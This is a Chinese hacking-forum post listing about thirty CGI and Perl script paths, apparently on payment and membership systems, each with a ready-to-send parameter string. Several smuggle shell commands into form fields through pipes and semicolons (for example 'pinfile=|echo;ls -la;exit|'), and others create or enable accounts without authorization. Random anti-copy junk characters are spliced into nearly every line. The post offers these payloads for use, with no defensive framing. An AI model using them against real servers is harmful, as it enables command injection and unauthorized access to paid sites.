找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3009|回复: 0
打印 上一主题 下一主题

Cgi-bin 30个漏洞+使用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:55:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
==============================
$ C' h9 ]) A7 A6 b1 v$ v( s7 u: a, k9 c+ f0 l- d
/smspass.pl/ y3 i+ p, X5 Z1 y1 d% b" w
username=username&password=password
( _! Z. D5 U$ l: M4 \( }2 f/ C  [/ [! A% H' }# D# f
/index.cgi
. c) f# P# X* ?6 [/ B$ M+ Iwei=ren&gen=command' X, z6 h+ x1 _  N) u6 S/ R$ O

! L: W9 s# Z0 r2 @6 O/passmaster.cgi; o7 w. U% Q4 e& i
Action=Add&Username=Username&Password=Password
$ o' P4 I8 v( j5 [" k4 x6 l. J
* y" ?# R' }; P0 |( Q- c/accountcreate.cgi2 `7 \/ X8 g( i& _
username=username&password=password&ref1=|echo;ls|2 j( `7 W# L' ]( i" W4 W) P+ H2 k

- _# N6 m3 T% E. ]/form.cgi* F( k* O" Y; N  }/ R2 ?
name=xxxx&email=email&subject=xxxx&response=|echo;ls|
: @. l1 b" s" R8 B+ c+ n/ t; Q3 I( r+ w1 r
/addusr.pl) I& B6 ]' a9 b% G) S( H
/cgi-bin/EuroDebit/addusr.pl
$ R# X- L  x2 q0 ^1 L0 q/ V# Guser=username&pass=Password&confirm=Password+ n1 G& Y: Q+ M+ Z
: j# _! v2 l- y8 P$ F
/ccbill-local.asp8 x" s  a( ~% R" w5 Q# q' f
post_values=username:password
  b! E( l5 O/ C. y- X: W3 l' C  u' h# B
/count.cgi' R, A1 f0 q+ D% {9 N  h' h  G* W
pinfile=|echo;ls -la;exit|# I- q7 V4 r5 [, ^

: o' K5 Q! \6 x* m# _0 D1 O/recon.cgi9 r* P( v) o& k+ }- D
/recon.cgi?search) V+ ?2 L8 X! Q( L$ }8 A- b
searchoption=1&searchfor=|echo;ls -al;exit|% R9 s( C7 G0 v: K; g" D4 W
5 k5 b3 T" F5 U0 P, k. {4 F
/verotelrum.pl
* N  |& N8 M0 \0 E: ^- l9 Gvercode=username:password:dseegsow:add:amount<&30>
8 K3 g% c8 L- j: c: S5 P# t* F
/ f6 Q' S- a6 w7 ?+ H8 N/af.cgi% ^- x1 R- ^7 @- ^- w$ Y
_browser_out=|echo;ls -la;exit;|
" e2 K5 v! R$ @# |& C9 k! r& X& q# Y# e. K1 B6 S3 I
/modify.cgi
: B( Y$ L' P' e* J5 d8 [$ gusername=username&password=password&expire=30
$ U9 l4 j1 v( L0 L; w; ?* A: ?
8 _( c  m8 r/ b9 A( Y- B. H/openjournal.cgi, e9 O( e0 H. V$ ?' `
edit=1&ct=2&go=|echo;ls -al;exit|
6 ]9 F) M, e' G, e9 X9 }  H) a4 {, n0 K. }4 [
/gx9passwd.cgi
0 }3 j6 [7 u( g$ }5 D+ A+ w3 i" wcmd=ADD&user=username&pass=password; l* X* |9 W0 Y- c1 q' u& ]( q

# p& i# r; ?0 w/probecontrol.cgi" r" l) }% h' \. v4 B
command=enable&username=username&password=password1 _7 ]0 |5 x5 A% O

# a$ v3 s& E; f9 ~6 B+ m/recon.cgi# R# \( i2 \8 b9 q
searchoption=3&searchfor=echo;ls -la;exit
) w! ~. e+ [2 z5 k" k: @* {% G7 ~
) W9 [- }2 \! |/ v4 _/ }0 w/htadd.pl" w  m( P, C  H) i* G3 k
configfile=|echo; ls -alt; exit
4 D; ?7 b' g2 e3 \" _/ d& d, P! d( p8 l$ S. ^+ Q2 i0 z
/gx9passwd.cgi
0 G, u9 o- d4 i. m  X; T) B4 [cmd=ADD&user=username&pass=password
( U( f) F. {# G  d+ ^/ g' k" j* B" M: r* V
/ibill*.pl% g; g% y+ L& W' v8 Q& X
reqtype=add&authpwd=authpwd&username=username&password=password
4 `0 Y  B# Y; j: z; C3 e
3 i6 j6 x' ~' M4 X/cpay.cgi
3 q$ \% G. `4 C5 l( v  n. dcommand=add_member&username=username(EMAIL)&password=password(DES)
5 A5 Y& M+ A: Y, t# S6 \/ G( L7 H, Y2 Z5 y
/globill_ut.cgi
* ^5 m4 {( s/ f* g! p1 Zdo=add&username=username&password=password&wpassword=password5 ^7 @4 u& y( Y

0 w- b7 b& u% h/usercontrol.cgi
7 \0 D! T0 q- v$ L7 Y3 Zcommand=enable&username=USER&password=PASS" |! _3 D2 x2 q' @* {" P. D6 K

( G( I" p# H( m/globoSALErum.cgi
1 d3 X9 H, t4 u) z  K4 j& eaction=ADD&seccode=seccode&login=username&password=password# I9 j+ }! N9 V2 z: E* ?& M
1 P) I+ ?8 c; E% J. W2 W
/addusr.pl4 E: Y1 j0 u' `, {, g* u1 ~
user=USER&pass=PASS&confirm=PASS: m5 b& T* y. B. F! B4 R# _9 i9 i- [
, c7 V0 h5 U) \( K
/pincount.cgi
4 b. o. o$ h6 d: ?* x/cgi-bin/mastergate/pincount.cgi/ z9 A8 q) s* c! j: S1 T
pinfile=|echo;pwd;exit|% l+ B* g9 U* k: N& n2 K* S: G- M

% t" a$ D, l$ N  `' E$ Y" T/accountcreate.cgi9 ?- n( _' h0 d0 ^1 F% T1 Y
/cgi-bin/gateway/accountcreate.cgi% J; {: G& B; `* Q$ [
username=username&password=password&password2=password&ref1=|echo;ls -al;exit
/ h+ Y: E- n% P3 r% G  H6 q
6 N7 u# `. N$ \9 [1 R8 y* U: O  W/af.cgi  k5 {+ E) z+ ?! ]
/env.cgi# l) O8 g9 B- i* b
ADD+;echo;pwd;exit
1 ~" j- K* c; I& T* H* d9 y* G2 g% F( y6 v2 n: X: p: n. Y8 F
/count.cgi
6 U8 R0 }; [* t* O, y  b3 j" Fpinfile=|echo;pwd;exit|; ?" u8 d$ c  F. U& p: _
: U4 O8 ^* M4 [
/recon.cgi
+ K% q4 U) ~# ?  D0 Csearchoption=1&searchfor=|echo;ls%20-al;exit|% |3 |$ D; g  W  F7 u- e% g/ D% g

$ q9 |& B% Q# I( C7 v0 y/add.cgi
. f2 T* I( p  I0 W, ]username=username&password=password&expire=30& Q% D! f! K% {# M, i+ D

. l" r# U5 D! ^  j& r$ v; B==============================( t' Y/ W1 z% S% a- d, W' G' l
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表